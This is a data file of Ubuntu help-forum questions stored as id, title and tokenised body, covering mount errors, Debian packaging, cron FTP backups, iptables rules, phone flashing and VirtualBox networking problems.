336217	umount /mnt deleted home directory	i did something incredibly stupid : while tinkering with mount / umount trying to relocate some space , i did as i read on one website , and dit sudo umount -f /mnt ( i do n't remember whether i used -f or some other command to force it ) and when i did it , it suddenly crashed ubuntu . then i could n't access my profile ( because of lack of home directory ) i tried this : deleted home directory . please help and it worked , but the problem is , that this new home folder does n't have any of my old files . so the question is : is this unmounting reversible ? or were my files deleted ? to rephrase the question : what could happen while unmounting /mnt ? what can i do to link my old home folder with new ? typing editor /etc/fstab got file system < mount point < type proc /proc /host/ubuntu/disks/root.disk / /host/ubuntu/disks/swap.disk none ( sorry it took so long , i had problems accesing it ) another question : what is the difference with /etc/fstab data and the data which can be retrieved by df -h ? i manipulated with filesystem using info from df -h and now the info from fstab confuses me
336223	getting directory of a specific file in a folder and save it into a variable	here is my problem . i want to store the directory of a specific file in a variable via terminal but in my folder there are many files let say one of them is test1432.config and the other is test1432-busybox.config and the other files whose extention are not .config . so i decided to write fst_directory= '' % s '' % ( co_directory [ 3 : ] ) + `` /*.config '' but if i do that in this way , it also takes the test1432-busybox.config doesnt it ? how could i do that ? thanks in advance edit the only differences between two file is the busybox part . i mean filename-busybox.config and filename.config . i always want to choose filename.config edit2 since nobody share the solution . i created my own . in this case the busybox is not necessary file for me . so i decided to delete them and after that i can choose the true file easly . if the file is important and you could not delete it.you can move it somewhere else and move back after the operation .
336229	unable to try and install from vmware	i 'm running windows7 on my pc , i am trying to install ubuntu 13.04 through vmware but i 'm unable to complete . is there any problem with my processor or motherboard which is different for ubuntu or windows ? do ubuntu need any diff supported devices ?
336230	how to download 11g express edition on ubuntu server ?	i can not download the oracle db 11g express edition on ubuntu server . can anybody help with detailed terminal instruction or any other way .
336232	modification to distribution , what 's allowed ?	i plan to distribute a web application/database commercially via a vm image , ( a virtual appliance ) . the plan is to use ubuntu as the os for this vm . i understand that we can not modify the distribution without violating ip rights and licensing rules . based on # 2 , 3rd bullet in the ip rights policy ( http : //www.canonical.com/intellectual-property-policy ) my question is : does removing packages and stripping down the distribution constitute modification ? furthermore , does adding other components such as apache tomcat or posgresql db constitute a `` modification '' . i tend to think not , but would like to hear from the community .
336233	global menubar in libreoffice 4.1 in ubuntu 12.04	is there any way to install lo-menubar for libreoffice 4.1 installed from the official libreoffice ppa in ubuntu 12.04 ? thanks in advance !
336234	webserver losing traffic	i have my e-commerce application running on ubuntu 12.0.4 on tomcat 7 servlet . i get around 7000000 hits everyday on this webserver . however i suspect that the webserver is discarding some traffic ( sending 503 responses ) to a fair bit of traffic . is there a way to know ( through some log file on the server ) how much traffic it has discarded due to it being busy ?
336237	guide on upgrading ubuntu 11.10 to 12.04 ( troubleshoot queries )	once ubuntu os is upgraded to 12.04 from 11.1 1.will old apps/tools/plugins remain updated or else i would be required to reinstall all of them ? 2.will it erase user 's old data files from disk ? 3.will it remove my internet browsing history , cookies , password ? 4.what major changes are expected post upgrade , any precautions or back up to be done ?
336244	package versioning explanation and inspection ( for apache )	i am aware that ubuntu locks releases of packages and applies bug fixes . taking the example of php , php -v may report something like the following : 5.3.10-1ubuntu3.4 here we have php versions 5.3.10 with security fixes applied by ubuntu contributors with an internal version number of 1ubuntu3.4 first question is am i correct so far ? now when i do apache2 -v i see the following : server version : apache/2.2.22 ( ubuntu ) now i know i have the apache release 2.2.22 but it doesnt seem to tell me what the internal ubuntu version number is . in reference to another question : how do i apply a security update to apache i need to be able to properly identify which ubuntu patch is applied to confirm if a security fix has been applied . typing dpkg -l apache2 starts to tell me this but seems to get cut off : ii apache2 2.2.22-1ubuntu apache http server metapackage how can i get this info ?
336248	adding google input tools for ubuntu	for easy typing in tamil i need google input tools . i do n't know how to install it . i found information about downloading the key from google 's website but downloading was unsuccessful . cab you help me as am new to linux ?
336250	change apache2 root folder drive	i 'm trying to change the directory of my default apache site to a folder in another drive . the problem arises with the fact the ubuntu has named all my additional mounted drives as new volume , new volume1 , new volume2 , etc . the space in the drive name causes issues in the /etc/apache2/sites-available/default which looks like this . < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /media/omk/new volume2/server < directory / > options followsymlinks allowoverride none < /directory > < directory /media/omk/new volume2/server/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined on apache2 restart , i get the following error syntax error on line 4 of /etc/apache2/sites-enabled/000-default : documentroot takes one argument , root directory of the document tree action 'configtest ' failed . the apache error log may have more information . ... fail ! this is caused due to the space in the path , which apache assumes as 2 different arguments separated by a space . i need to either make it look like a single argument retaining the path or change the volume name ( which again i 'm not able to figure out how ) any help appreciated ! thanks .
336253	what is the purpose and role of rules file in debian packaging	i am trying to debian package my c++ application developed with aid of netbeans 7.3 . here is bit of makefile of it . appname=remotedevicecontroller install : install config.xml /etc/ $ { appname } .conf.xml install devices.rules /etc/udev/rules.d/ $ { appname } .rules install error.log /var/log/ $ { appname } .log install init.conf /etc/init/ $ { appname } .conf install init.d /etc/init.d/ $ { appname } install $ { cnd_artifact_name_ $ { conf } } /usr/local/bin/ $ { appname } chmod u+x $ { cnd_artifact_name_ $ { conf } } ./ $ { cnd_artifact_name_ $ { conf } } -i i am following how to create a .deb package and debian new maintainer 's guide . when i run dpkg-buildpackage -rfakeroot after successfully completing all the above steps i encountered following error $ dpkg-buildpackage -rfakeroot dpkg-buildpackage : source package remotedevicecontroller dpkg-buildpackage : source version 1.0-1 dpkg-buildpackage : source changed by satya gowtham kudupudi ( gowtham ) < gowthamk @ newmeksolutions.com > dpkg-buildpackage : host architecture i386 dpkg-source -- before-build remotedevicecontroller-1.0 fakeroot debian/rules clean dh clean dh : no packages to build . dpkg-source -b remotedevicecontroller-1.0 dpkg-source : info : using source format `3.0 ( quilt ) ' dpkg-source : info : building remotedevicecontroller using existing ./remotedevicecontroller_1.0.orig.tar.gz dpkg-source : info : building remotedevicecontroller in remotedevicecontroller_1.0-1.debian.tar.gz dpkg-source : info : building remotedevicecontroller in remotedevicecontroller_1.0-1.dsc debian/rules build dh build dh : no packages to build . fakeroot debian/rules binary dh binary dh : no packages to build . signfile remotedevicecontroller_1.0-1.dsc you need a passphrase to unlock the secret key for user : `` satya gowtham kudupudi ( gowtham ) < gowthamk @ newmeksolutions.com > '' 2048-bit rsa key , id 9a2853a0 , created 2013-08-22 gpg : gpg-agent is not available in this session dpkg-genchanges > ../remotedevicecontroller_1.0-1_i386.changes dpkg-genchanges : error : can not read files list file : no such file or directory dpkg-buildpackage : error : dpkg-genchanges gave error exit status 2 at http : //www.debian.org/doc/manuals/maint-guide/dreq.en.html # defaultrules there is no explaination for what the role of rules file is . what does % : dh $ @ mean ? why does dpkg-buildpackage -rfakeroot say dh : no packages to build . ?
336262	how do i install utorrent on 12.04 ?	i have just install ubuntu 12.04 and i want to install utorrent . it 's was easy on windows . as you can see on the official web-site , there is no gui version for linux . so how can i install utorrent on ubuntu 12.04 note : if i have to use command line ( terminal ) for it , please tell me how to open it . thanks .
336266	ubuntu 12.04 2d mode after upgrading my nvidia graphic driver	i am running ubuntu 12.04 on a t430s laptop that has a nvidia optimus graphic card ( nvs 5200m , 1gb ) . i tried to download and install the latest nvidia driver from here . after restart , i found out that ubuntu is running in 2d mode ! i tried to uninstall the nvidia driver using -- uninstall switch and also purged all nvidia packages . still no luck ! what should i do ? i need the opengl feature of my graphic card . edit : the only temporary solution i found right now is to use bumblebe according to here .
336270	uninstall windows	i have a question about removing windows . i installed ubuntu from the windows desktop because the live cd did not work . how can i delete windows without removing ubuntu ?
336272	how is ubuntu live user graphical session ( startx ) started up in a livecd ?	i am trying to build a custom iso , using ubuntu-builder . i 've taken a 12.40 mini remix iso as a starting point . here is my specific example - however , i 'm interested in principle how the process goes ( so i can apply that to other de/wm ) . when i run a new iso , built directly from the mini remix starting iso , all is as expected - i can run the new iso in a virtual machine , and the boot process terminates with text-only prompt for the live ubuntu user . now , i try to install lxde ( there is an entry for it in ubuntu-builder , apparently it installs lxde-core and x dependencies ; and i manually have to install lxterminal , and as icons are missing , probably lxde-icon-theme as well ) . i have to also manually install xinit , so i have startx . but this , by itself , does n't do much : if i boot this customized iso in a virtual machine , the exact same thing happens as with the `` original '' iso - boot process completes with a text mode prompt for ubuntu live user . if i now type startx at this prompt , then lxde starts ( running startlxde at this prompt will complain about x ) , such that when you start lxterminal from that desktop , it is started under the live ubuntu user . in livecdcustomization - boot init , it is mentioned : boot init you have to edit the files in edit/usr/share/initramfs-tools/scripts/casper-bottom/* for example you can change the hostname or the livecd user . ... but i do n't exactly understand what is exactly being ran by what there . the ubuntu-builder unpacks these files under /home/ubuntu-builder/filesystem/usr/share/initramfs-tools/scripts/casper-bottom/ - but as far as i can see , most of these just run some inline sed commands , i can not see much executive commands there ? still , i tried to copy one of the scripts there as a new script , 51startx , which in the executable section has : log_begin_msg `` $ description '' chroot /root startx chroot /root startlxde log_end_msg this does absolutely nothing - again , after boot , i get the usual text prompt ubuntu @ ubuntu : ~ $ . then i found modify : startx automatically , add apt , etc - backtrack-linux.org : to have a graphical login , just install gdm and run it in startup : aptitude update aptitude install gdm then , edit /etc/rc.local , and add a line before `` exit 0 '' like this : service gdm start this is not the best way , but run ! . this must work running `` update-rc.d gdm defaults '' , but this way fail . and indeed - i added : startx startlxde ... to /etc/rc.local - and this indeed does boot , and start lxde automatically - however , when i run lxterminal , it is under user root - not under the live user ubuntu ! so , what should i do , so that i can start ( any ) x and/or any desktop environment automatically at boot under the live ubuntu user ? note that in this case , i would not like to use an additional desktop manager ( e.g . gdm ) nor a corresponding greeter - but it would be good to know , if a solution for automatically starting up x would also work for a desktop manager or a greeter .
336275	13.04 launcher and menu bar disappeared	last night i downloaded python 3.3 and idle . i turned it on today and the launcher and menu bar disappeared . it did n't even ask for my password and all i see is my desktop . i tried finding answers from many places : launcher and window menu bar missing after 12.04 upgrade , unity has disappeared , and how do i reset my unity configuration ? . but they all did not help and i do not know what to do . i tried unity -- reset many times and it says reset option is now deprecated . i am not sure if this means anything but sometimes there are internal errors and when i try to show the details some directory which includes /bin . comes out and nothing else . any help would be greatly appreciated .
336276	dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem .	how do i install a huawei e1752 , since my cursor doesnt work . how do i use the command line to install the modem and ensure that i complete the update .
336282	use 10.04 desktop on 12.04 or 13.04	how can i use the good desktop ( pull downs at top , screen switch lower right , lower info ribbon ) from 10.04 on 12.04 or 13.04 ? ? ? the jitter strip on the left is terrable ! ! ! any info ro nane of desktop change info might help . since i am still using 10.04 to avoid that jitter stripdesktop , and it 's ending . thank you for any help available . art
336283	cron task appears to run in syslog , but does not appear to be actually running	i made a short script on one server to backup a folder and send it via ftp to another server . i 'm trying to set it to run every minute using crontab . it works perfectly when i run it manually , but when cron runs it , nothing appears to happen ( i.e . no file received on the other end ) . as i said in the title , the task shows up in syslog as if everything is a-ok . here 's the script : # ! /bin/sh cd /root filename= '' backup- $ ( date + % b_ % d_ % y_ % h : % m ) .zip '' zip -r $ filename folder ftp -in 74.131.78.127 24721 < < eof > ~/log.txt 2 > & 1 user myusername binary cd desktop/backups mput $ filename eof rm $ filename crontab entry : * * * * * /root/backup.sh i entered this using crontab -e .
336294	installing ubuntu server 12.04 on vmware workstation 8 in an ubuntu 12.04 desktop	i 've got an ubuntu desktop 64bit with a vmware workstation 8 installed on it and now i 'm trying to install an ubuntu server 12.04.2 64bit as a vm but it prompts error and stops . here 's the error : unable to install the selected kernel an error was returned while trying to install the kernel into the target system . kernel package : 'linux-generic-lts-quantal ' . check /var/log/syslog or see virtual console 4 for details . afterwards it goes to ubuntu installer main menu and i used the shell access ash to read the /var/log/syslog to look for the error . here 's what i found ( even though i have no idea what i 'm looking for ! ) : in-target : e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? and a couple of lines later : base-installer : error : exiting on error base-installer/kernel/failed-install can someone tell me what 's going on ? i 've just downloaded the iso file for ubuntu server using torrent and i will download it once again from their website later even though i do n't think the file is damaged as it gets opened with archive manager successfully ! [ update ] i 've tested the same iso image file with aqemu and faced the same results . i 've also noticed that the image file i 'm downloading directly from ubuntu 's website is 12.04.3 while the one from torrent is 12.04.2 . we shall see if this new image file will work in few hours ( it 's the second time i 'm downloading it as the first time failed with a 404 error ) . [ update ] i 've just downloaded 12.04.3 from torrent and it works fine . the problem was either the 12.04.2 or my version was damaged !
336295	how to clean up aftermath from rookie ubuntu command	here are the commands i regretfully run : sudo chgrp root /usr/bin sudo chgrp root /usr/local i had recently added a user to root group and because my user still did not have write permissions , i assumed i had to reapply the group setting to those directories ( was originally root group ) . that led to issues with sudo command , namely : sudo must be setuid root which i 've fixed . then xubuntu would n't start , which i somehow fixed..now zsh is complaining : zsh compinit : insecure directories , run compaudit for list . my question is have i completely ruined this installation ? if not , is there a way to fix the permissions ?
336296	bash cut and grep commands through python	i 've tried to read a txt file and find the lines which contain a certain word `` checkout_revision '' . i want to find these lines one by one in a for loop and store them in my variable , let say temp . i heard grep with cut is suitable for this . however i could not do that . is there anyone to help me ? here is my code : for line in intersect : cmd= '' '' '' grep `` checkout_revision '' |cut -d\'\ '' \ ' -f2 '' '' '' % fst_directory cmd_test=os.system ( cmd )
336297	make files in iso image executable	i am creating an iso image using brasero on ubuntu . some of the files are executable , but as soon as i created the iso image the files are read-only and with no other attribute . how can i retain the file attributes so they can remain being executable ?
336299	ca n't login as user after upgrade 12.04 to 13.04	after upgrade i ca n't log in . error message : could not update iceauthority file /home/username/.iceauthority this is on a system with 2 partitions . this installation is on /dev/sda5 type ext4 . could this partition be read only ? maybe because of an error ? if so , how can i repair this partition ? btw , i can login as guest . help highly appreciated ... update user login works if i use recovery mode . also , the partition is shown as read only . i can change this using the recovery console , but it looks like it changes back to read only if i 'm returning to normal boot process out of the console . i tried to repair the partition with sudo rack.ext4 -v -f /dev/sda5 ( a command i found somewhere , without really knowing what i 'm doing ) but the results did n't show an error . â
336301	basics on installing	i just downloaded version 12 and after finding out that i had to burn the iso to a cd ( my win xp computer did not have any burning software on it ) , when i insert the disc it just wants to run a demo . i want to do a full install ( totally replace winxp and have only ubuntu ) . what 's the trick ? edit : my pc is a clone , built in 2006 by a local pc shop , has an amd athlon processor and a benq cd drive . it runs really slow using windows xp . i have previous experience with some older pcs - i have installed ubuntu in the past ( i think it was version 10 ) and it breathed new life into them . i even used one of them for writing an article comparing openoffice to ms office and did a little drupal development work on it , even after it seemed the computer was essentially dead with windows . anyway , it looks like it is too old to upgrade to ubuntu so i am giving up on this . thanks for all of your help . if there is any way to close this post , please feel free to do so .
336302	gpu accelerated chromium	i 'm running a fresh install of xubuntu 12.04 and i 'd like to know how can i activate my nvidia card 's gpu acceleration inside the latest stable chromium . i wanted to play an mp4 file without the cpu firing to 100 % . i 've installed mplayer and vdpau ( and they work fine ) , but so far i have n't been able to use them inside chromium . a couple of years ago , i used gecko-mediaplayer but the plugin 's been blacklisted ... any ideas ? here 's the output of glxinfo | grep render : direct rendering : yes opengl renderer string : geforce gt 520m/pcie/sse2 gl_nv_blend_square , gl_nv_compute_program5 , gl_nv_conditional_render , gl_nv_parameter_buffer_object2 , gl_nv_path_rendering , gl_nvx_conditional_render , gl_nvx_gpu_memory_info , and here 's the output of lspci | grep -i vga : 02:00.0 vga compatible controller : nvidia corporation gf119 [ geforce gt 520m ] ( rev a1 ) chromium is churning out a lot of warnings whenever i open the page , as you can see here and i 've just found out a promising lead , lost in a sea of performance warnings : nvidia : could not open the device file /dev/nvidia0 ( operation not permitted ) . after adding the user to the video group , chromium is now unable to play mp4 's at all ( yup , not even using the cpu ) . i got the same error messages as before , but a new one popped up as well : [ 4296:4296:0827/100001 : error : gpu_video_decode_accelerator.cc ( 208 ) ] not implemented reached in void content : :gpuvideodecodeaccelerator : :initialize ( media : :videocodecprofile , ipc : :message* ) **hw video decode acceleration not available** .
336305	install python 2.7 on ubuntu 12.4	i have install ubuntu several day ago . i have install python on windows before and everything was simple . now on ubuntu iâm getting stuck with installation of python . so my question is : how can i install python 2.7 on ubuntu 12.4 ? thanks .
336306	i want to use ubuntu for developing my application - pl help	i am an mfg engg professional with 30 years experience in cnc / cad / cam fields . i have stumbled upon an application for time & motion study and using vb.net sql 2005 express developed it into a full fledged app - with visual studio . i am hearing the word that ubuntu is a good system . pl tell me if i can use it as a development plat form for my app development - to make it as a true open source one - preferably using the same .net , vb etc technologies . i am a developer with vb due to its easy visibility of books plus training courses for the same . i am not very much conversant with 'open source ' though i feel it is a good thing.. can some one help me with some suggestions ? will it help me 'stay afloat ' with some kind of revenue flow - even though my app will become an open source ? if so , how ? pl reply . rgds renga iyengar chennai india
336313	what is the difference between ipython and ipython3 ?	they are both on the repos . but i ca n't find out what the difference is .
336317	nexus 4 not detected as usb device with ota update 4.3	i have submitted a question on the google mobile forum , but not had any responses yet . i am fairly certain that my issues with usb connectivity started when i allowed the 4.3 ota update to install on my personal handset . i have developed apps for it , used it for testing , and have mounted it via usb without issue ( mtptools , etc ) previously . now i ca n't even find my device on lsusb ; compared to a test device at work ( another nexus 4 , which is still at 4.2.2 ) my phone effectively is dead to any machine apart for being a device to charge . my phone is standard-issue android nexus 4 and i want to avoid going down 'root road ' ; are there any suggestions in finding out the cause/possible fixes ? even a windows machine can detect the 4.2.2 nexus 4 as a media device , but not my 'upgraded ' one . thanks in advance .
336318	wo n't read or play cd/dvd ?	i have an emachine w3105 . amd sempron 3100+ 1.8 ghz processor 512 mb ram 100 gb hard drive dvd±rw dl drive i replace windows xp os with ubuntu 12.04 and it wo n't detect the dvd±rw dl drive . i ran sudo lshw -c disk and this what i get . pci ( sysfs ) *-disk description : ata disk product : hds728080plat20 physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/sda version : pf2o serial : pfd202s4sm9lhj size : 76gib ( 82gb ) capabilities : partitioned partitioned : dos configuration : ansiversion=5 signature=000adb4f *-cdrom description : dvd reader product : rw/dvd gcc-4482b vendor : hl-dt-st physical id : 0.0.0 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/sr0 version : 1.00 capabilities : removable audio cd-r cd-rw dvd configuration : ansiversion=5 status=nodisc *-disk:0 description : scsi disk physical id : 0.0.0 bus info : scsi @ 4:0.0.0 logical name : /dev/sdb *-disk:1 description : scsi disk physical id : 0.0.1 bus info : scsi @ 4:0.0.1 logical name : /dev/sdc *-disk:2 description : scsi disk physical id : 0.0.2 bus info : scsi @ 4:0.0.2 logical name : /dev/sdd *-disk:3 description : scsi disk physical id : 0.0.3 bus info : scsi @ 4:0.0.3 logical name : /dev/sde it look to me that ubuntu os detect the dvd drive . does this mean i have to install the propriety drivers for amd ? i also tried the mount command and i get this /dev/sda1 on / type ext4 ( rw , errors=remount-ro ) proc on /proc type proc ( rw , noexec , nosuid , nodev ) sysfs on /sys type sysfs ( rw , noexec , nosuid , nodev ) none on /sys/fs/fuse/connections type fusectl ( rw ) none on /sys/kernel/debug type debugfs ( rw ) none on /sys/kernel/security type securityfs ( rw ) udev on /dev type devtmpfs ( rw , mode=0755 ) devpts on /dev/pts type devpts ( rw , noexec , nosuid , gid=5 , mode=0620 ) tmpfs on /run type tmpfs ( rw , noexec , nosuid , size=10 % , mode=0755 ) none on /run/lock type tmpfs ( rw , noexec , nosuid , nodev , size=5242880 ) none on /run/shm type tmpfs ( rw , nosuid , nodev ) gvfs-fuse-daemon on /home/humberto/.gvfs type fuse.gvfs-fuse-daemon ( rw , nosuid , nodev , user=humberto ) i tried this command lspci -vvnn | grep ga and i get this , control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- bridgectl : parity- serr+ noisa- vga+ mabort- > reset- fastb2b- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv+ vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping+ serr- fastb2b- disintx- control : i/o+ mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- control : i/o- mem- busmaster- speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- 01:00.0 vga compatible controller [ 0300 ] : via technologies , inc. k8m800/k8n800/k8n800a [ s3 unichrome pro ] [ 1106:3108 ] ( rev 01 ) ( prog-if 00 [ vga controller ] ) control : i/o+ mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr- fastb2b- disintx- this is where i get stuck . i just want to be able to read cd and dvd in the drive ? can anyone help . thank you
336321	what do i have to add to this iptables setup to allow mysql access through ssh ?	i just want to be able to access mysql through ssh , but i do n't want to accept everything as well . what 's the most secure way to do this if any . here are my rules : *filter : input drop [ 14:1434 ] : forward drop [ 0:0 ] : output drop [ 0:0 ] # input for http -a input -i eth0 -p tcp -m tcp -- dport 80 -m state -- state new , established -j accept # output for http -a output -o eth0 -p tcp -m tcp -- sport 80 -m state -- state established -j accept # input ssh -a input -i eth0 -p tcp -m tcp -- dport 9991 -m state -- state new , established -j accept # output for ssh -a output -o eth0 -p tcp -m tcp -- sport 9991 -m state -- state established -j accept # smtp -a input -i eth0 -p tcp -- sport 25 -m state -- state new , established -j accept -a output -o eth0 -p tcp -- sport 25 -m state -- state new , established -j accept -a output -o eth0 -p tcp -- dport 25 -m state -- state new , established -j accept commit thanks !
336325	can use c++ write custom qml plugins in ubuntu sdk	recently , i want to develop a app for ubuntu showdown , but i want to use some plugins use c++ . so i want to write custom plugins , then i create a project with qml extension library . however , when i run it , it just pops up a dialog . i have no reputation to upload an image , if you can do it self , you will know what i say . i want to know whether i can use c++ in ubuntu touch apps , if i can , i want some examples . ps : i am new to qml and ubuntu sdk
336332	single boot , ubuntu 13.04 only , can not re-install with dvd	i wanted to re-install 13.04 , but when i insert the dvd it does not recognize it ... and it just boots up as usual ... it does not take me to the install dvd . i put in a boot repair cd ... and that is not recognized either . i am very new to linux ... so i 'm lost . i wanted to re-install ubuntu 13.04 , because my boot is full , and only has 2.64 mb of storage left . i can not add or remove software , as they fail due to this error . my intention was to re-install 13.04 , use gpart to increase my boot drive space , to avoid this problem again . any help would be greatly appreciated .
336337	download and install without a cd on a microsoft windows xp desktop machine	i have been trying to download and install latest ubuntu without making a cd . i have tried 3 times . i downloaded something and installed it . but there was no trace of ubuntu but just windows xp . it certainly looked like it was installing something .
336339	where do i find absolute beginner 's help on how to use ubuntu preinstalled on my notebook ?	i purchased a hp elite notebook 2730 with an ubuntu operating system on ebay . i 've never used ubuntu before , and have to admit i 'm only used windows 7 before and not real computer literate . i 'd like to access the internet , google and facebook . not sure how to even turn it on . can you please help me to use my hp elite notebook with ubuntu ?
336341	how to run java/javac command from terminal	i have installed jdk using .deb ( convert from rpm ) , but i ca n't run java/javac command from terminal .
336344	how to copy updates from 1 linux box to another using cli remote serial and usb drive	i have 2 old pc 's that i 'm going to remote into using serial port/tcp . the first one is a 32-bit machine that i remoted into serially and could n't get it to connect to the internet for various reasons . i installed 32-bit ubuntu 12.04 and tried to install some deb 's and packages via the /media/usbdrive with little success . so now i just got my 2nd linux box which is a 64-bit duo-core dell which i could run the gui , connect to the internet and download some cool stuff . now i have the 64-bit machine with 32-bit ubuntu 12.04 installed and i 'm wondering if there 's an easy way to copy everything from the 64-bit machine to the 32-bit machine using only the remote terminal serial to issue commands and the usb drive to transfer files .
336346	some things i do n't quite understand about partitioning for an installation	so i 'm installing ubuntu onto my main desktop , but i do n't quite understand the partitioning and how ubuntu works in general . i have 4 ssds which i would like to put into a jbod array . i did some research and found out i can make one partition which goes over all four drives so i can install ubuntu onto them , as if they were one drive . i want to have all of my programs installed onto the ssds ( /etc/dev/ if i understand correctly ) while my hdd should hold /home/ . is the root partition the partition in which the programs are saved in ? if not , on which partition is /etc/dev/ saved ? how do i make one large partition over 4 drives ? i have 12gb of ram . do i need to make a swap partition ? i do n't have any other os ' installed .
336347	directory issues with joomla install , realized i was running as root	sorry if this is long : i 'm running version 12.04 , apache web server and php 5 i am attempting to install joomla in var/www/ , everything seemed to have went ok but as i was viewing my directory permissions via the joomla control panel i noticed that nothing was available for writing . after doing a little more research i found that the file permissions we right ( 644 and 755 ) but then i noticed that i extracted the folder as root . i am assuming because i did this as root , instead of another users , it will not allow me to write to those folders unless it 's 777 ( which i 've tested on a second install ) is there a proper way or tutorial for creating a website with a different user that would allow proper directory permissions ?
336352	nexus 4 fails to boot after ubuntu touch flash	i was running cm 10.2 on my nexus 4 until i decided to give ubuntu touch a try . these are the steps i took . because i as already running a custom os , i already has a custom recovery installed ( cwm ) , so i just downloaded the saucy-preinstalled-touch-armel+mako.zip from here and dropped it on to root of my sdcard . rebooted in to cwm recovery . factory reset/wipe cache partition install zip from sd and selected the downloaded file . it said everything was successful , but i 'm now stuck on the google logo after trying to boot . i can get back to the bootloader and in to recovery just fine . i just ca n't get it to boot . i loosely followed these directions ( manual download & installation ) , i just did n't rename the file - is that truly necessary ? as far as i know , it flashes the same way . anyway , any help would be appreciated . edit : did i need to flash saucy-preinstalled-touch-armhf.zip first ?
336354	virtualbox suddenly does n't connect to networks	i 've had lucid lynx ( i think that 's ubuntu 10.4lts ) running on virtualbox v4.2 . for about 6 moths already running on win7 host os . i 've never had any issues with internet connectivity so far , but today afternoon it just stopped working without any apparent reason . i 'm on my laptop and win7 still connects to the internet . i can see the 'virtualbox bridged networking driver ' in the wireless network properties on my host os . so far i only needed internet access so i used nat ( adapter type : intel pro/1000 desktop with cable connected option enabled ) , however all i receive in return is 'networking disabled ' . in terminal ifconfig -a returns : eth2 link encap : ethernet hwaddr 08:00:27:76:54:26 broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:44 errors:0 dropped:0 overruns:0 frame:0 tx packets:44 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:3152 ( 3.1 kb ) tx bytes:3152 ( 3.1 kb ) in terminal iwconfig returns lo eth2 no such extensions . ping-ing any address returns network is unreachable except when i ping what it says is my ip adress ( which is also weird 127.0.0.1 ) . as i was reading up on the problem i 've noticed that a lot of people solved their problem by simply changing their adapter type so i did that multiple times ( for various versions of pcnet-fast ii/iii and the aforementioned intel pro/1000 ) but without result . i 've also tried using 'bridged adapter ' with different names and adapter type options also without result . my etc/network/interfaces file looks like : auto lo iface lo inet loopback which resembles this problem but when i try using his solution : ubuntu-admn @ ubuntu : ~ $ sudo dpkg-reconfigure resolvconf package `resolvconf ' is not installed and no info is available . use dpkg -- info ( = dpkg-deb -- info ) to examine archive files , and dpkg -- contents ( = dpkg-deb -- contents ) to list their contents . /usr/sbin/dpkg-reconfigure : resolvconf is not installed
336356	which desktop is installed by default ?	i just installed 13.04 desktop version ... which gui was installed ? ? is this gnome ? how do i identify which one it is ?
336360	is this exotic resolution dell u2913wm display supported ?	i 'm considering to upgrade to this dell u2913wm display and was wondering whether it will work with ubuntu given its exotic resolution of 2560 x 1080 . my graphic card is nvidia gtx titan so i have no compromises on this side . if anyone has used it for development in ubuntu i will be happy to know opinions .
